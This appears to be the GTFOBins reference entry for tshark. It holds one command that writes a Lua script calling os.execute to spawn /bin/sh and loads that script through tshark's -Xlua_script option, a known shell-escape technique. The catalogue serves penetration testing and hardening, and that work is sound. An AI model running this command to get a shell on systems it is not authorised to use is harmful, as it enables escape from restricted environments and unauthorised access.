GTFOBins.github.io/_gtfobins/tshark.md

213 B

description functions
This program is able to execute [`lua`](/gtfobins/less/) code.
shell
code
TF=$(mktemp) echo 'os.execute("/bin/sh")' >$TF tshark -Xlua_script:$TF